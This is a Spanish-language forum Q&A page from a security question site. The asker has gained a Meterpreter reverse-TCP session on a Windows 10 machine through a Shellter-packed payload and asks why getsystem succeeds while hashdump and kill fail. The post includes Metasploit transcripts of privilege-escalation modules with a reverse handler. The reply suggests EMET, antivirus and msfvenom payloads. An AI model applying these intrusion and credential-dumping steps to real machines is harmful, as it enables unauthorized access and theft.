Escalamiento de privilegios obtenidos pero sin autoridad utilizando Metasploit

Navega tus respuestas
9

Estoy enfrentando un problema muy extraño. He abierto una caja con éxito usando Shellter con Meterpreter_Reverse TCP.

Aquí está el sysinfo: 

meterpreter > sysinfo
Computer        : ********
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows

Ahora lo extraño es cuando escribo: 

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Dice que obtuve la Autoridad NT, sin embargo, cuando escribo: 

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeDebugPrivilege
  SeImpersonatePrivilege
  SeSystemProfilePrivilege
  SeTcbPrivilege

Estos son solo los privilegios que obtengo. No todo. Si intento usar hashdump: 

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Además, ya he migrado a otro proceso de autoridad NT, en este caso (svchost.exe)

Si intento ejecutar un exploit local en segundo plano, dice que el sistema ya está elevado. 

msf exploit(ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[-] Exploit aborted due to failure: none: Session is already elevated

Además, si trato de usar el exploit "ASK" para obtener privilegios, esto es lo que sucede: 

msf exploit(ask) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[+] UAC is not enabled, no prompt for the user
[*] Uploading eobKMikmOsnWp.exe - 73802 bytes to the filesystem...
[*] Executing Command!

Y simplemente se congela, y no se da ningún aviso en la computadora de las víctimas.

También cualquier comando que intento ejecutar, simplemente me da un error que indica que no tengo acceso: 

meterpreter > kill 7744
Killing: 7744
[-] stdapi_sys_process_kill: Operation failed: Access is denied.

¿Estoy totalmente perdido para entender qué está sucediendo exactamente aquí? Dice que he ganado el acceso al sistema, pero ¿aún no puedo hacer nada?

¿Por qué?

Cualquier ayuda sería apreciada.

    
pregunta Sankalp Singha 09.07.2017 - 19:43
fuente

1 respuesta

1

¿El objetivo está utilizando EMET? En concreto, la aplicación de la lista blanca? Además, ¿cualquier tipo de AV?

Además, quizás sea porque no configuró la sesión, en la que confían tanto hashdump como getsystem. ¡También podría impedir que obtengas un shell interactivo !:

enlace enlace

Por último, ¿puedes usar una carga útil distinta de meterpreter (por ejemplo, generada a través de msfvenom)?

    
respondido por el grepNstepN 06.10.2017 - 21:06
fuente

Lea otras preguntas en las etiquetas

Seguridad sobre window.opener y iframes ¿Cómo operar un honeypot en la nube?